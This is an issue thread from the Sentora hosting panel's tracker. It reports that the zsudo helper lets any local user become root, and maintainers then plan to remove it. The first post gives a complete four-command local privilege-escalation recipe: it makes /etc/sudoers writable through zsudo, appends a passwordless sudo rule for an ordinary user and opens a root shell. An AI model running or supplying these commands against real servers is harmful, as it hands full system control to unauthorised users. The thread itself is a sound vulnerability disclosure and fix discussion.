zsudo gives root privileges to any local user

[KaidenP]

I was Checking out the zsudo file located at /etc/sentora/panel/bin/zsudo, and noticed that it can grant any local user root privileges. See the following:

Executed as root:

adduser tmp-user
passwd tmp-user 

Login as tmp-user:

/etc/sentora/panel/bin/zsudo chmod 777 /etc/sudoers
echo "tmp-user ALL=NOPASSWD:ALL" >> /etc/sudoers
/etc/sentora/panel/bin/zsudo chmod 440 /etc/sudoers
sudo -i

And BAM! You now have a root shell.

[bambusoft]

You can avoid this behaviour using this unnoficial and sentora team unsupported security script (still work in progress) http://sentora-paranoid.open-source.tk/

Only Ubuntu is covered, but any help is welcome

[KaidenP]

Ok, however is there a way to secure zsudo without apparmor or SELinux? Neither work on my server.

[5050]

I started a package of scripts to remove completely zsudo and touch all sources that require it to use small secured predefined scripts, one per function called.

It needs only I complete it.... it is on the table since many weeks, but i was too much loaded and also too much tired to work more on them after dinner... I'll try to release them this week.

[KaidenP]

Are they on github?

[Caffe1neAdd1ct]

@5050 This needs to go out for the next release. Please advise when you have completed the new scripts.

[MBlagui]

Notice we only require it for apache in sentora core. Could be easily replaced with a script. Issue with keeping compatibility with other modules.

M B

[MBlagui]

zsudo will be removed. Also sentora was never made to be used with shared SSH. Closing it.